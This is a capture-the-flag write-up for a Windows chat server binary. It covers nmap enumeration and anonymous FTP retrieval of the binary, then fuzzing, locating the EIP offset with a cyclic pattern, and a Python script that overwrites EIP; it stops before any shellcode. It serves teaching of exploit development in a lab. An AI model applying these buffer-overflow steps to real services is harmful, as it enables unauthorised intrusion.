```
Nmap scan report for 10.10.45.36
Host is up (0.046s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE           VERSION
21/tcp   open  ftp               Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
|_  SYST: Windows_NT
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2020-07-14T19:01:07+00:00; -1s from scanner time.
9999/tcp open  abyss?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
|     Welcome to Brainstorm chat (beta)
|     Please enter your username (max 20 characters): Write a message:
|   NULL:
|     Welcome to Brainstorm chat (beta)
|_    Please enter your username (max 20 characters):
```
So it looks like port 9999 (reported as abyss) is where the chat binary is listening. Now let's look at FTP and see whether anonymous login is allowed and whether anything is stored there. It is allowed, and we find a chatserver.exe and a DLL file. Let's download both and transfer them over to our Windows machine. Connecting to the service confirms it is a chat server application.

Now let's fuzz it on Windows: run the binary there, then connect to the Windows machine's IP on port 9999 using netcat.
```
nc <windows ip> 9999
```
Let's find out where it crashes. The username field simply trims the input to 20 characters, whereas sending around 2500 characters to the message field crashes the application. To find the offset at which the EIP gets overwritten, we use msf-pattern_create to generate a cyclic pattern of 2500 bytes:
```
msf-pattern_create -l 2500
```
This gives us a cyclic pattern, which we send as the message to crash the application again. We then copy the EIP value from the crash and pass it to msf-pattern_offset to find the exact offset.

The application crashes; I am using Immunity Debugger to observe the crash.

Here we can see the EIP is 31704330. We can also use mona to look up this value directly:
```
!mona po 31704330
```
which reports the offset. It turns out to be 2012, so now let's confirm that we can actually crash the application and overwrite the EIP at this offset.
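To see where the 2012 comes from, here is a small reimplementation of the pattern_create / pattern_offset logic, added here as an example (it is not part of the original write-up nor the Metasploit or mona code). It assumes the standard Metasploit cyclic alphabet (upper, lower, digit triplets: Aa0Aa1...) and takes the EIP value as the hex string shown in the debugger; because x86 stores the register little-endian, the four bytes that landed in EIP appear in the pattern in the reverse order of the printed hex.

```python
import string
import struct
from typing import Optional


def pattern_create(length: int) -> bytes:
    """Generate a Metasploit-style cyclic pattern (Aa0Aa1Aa2...Ab0...) of the given length."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    # 26 * 26 * 10 triplets = 20280 bytes is the longest unique pattern
    return bytes(out[:length])


def pattern_offset(eip_hex: str, length: int = 2500) -> Optional[int]:
    """Return the offset in the pattern of the 4 bytes that ended up in EIP.

    eip_hex is the register value as printed by the debugger, e.g. "31704330".
    Returns None if those bytes do not occur in the pattern (EIP was not
    overwritten by the pattern, or the pattern was too short).
    """
    needle = struct.pack("<I", int(eip_hex, 16))  # little-endian: 31704330 -> b"0Cp1"
    idx = pattern_create(length).find(needle)
    return idx if idx != -1 else None


if __name__ == "__main__":
    # Value taken from the crash described in the write-up.
    print(pattern_offset("31704330"))  # 2012
```

The first 2012 bytes are padding; bytes 2012 to 2015 of the pattern are the ones that overwrote the saved return address, which is why the confirmation payload below uses 2012 bytes of "A" followed by 4 bytes of "B".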
We do that with Python:
```python
import socket

# The username field is trimmed to 20 characters, so keep it short.
# The message is 2012 bytes of padding followed by 4 bytes of "B" (0x42),
# which should land in EIP if the offset of 2012 is correct.
username = b"nickapic"
message = b"A" * 2012 + b"B" * 4

print("Sending them bytes")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.146.130", 9999))  # Windows machine running chatserver.exe
s.recv(1024)  # welcome banner
s.recv(1024)  # username prompt
s.send(username + b"\r\n")
s.recv(1024)  # message prompt
s.send(message + b"\r\n")
s.recv(1024)
s.close()
```
When we run this it works: the application crashes with EIP set to 42424242, which is "B" (0x42) in hex, so the four bytes after our 2012-byte padding are landing in EIP.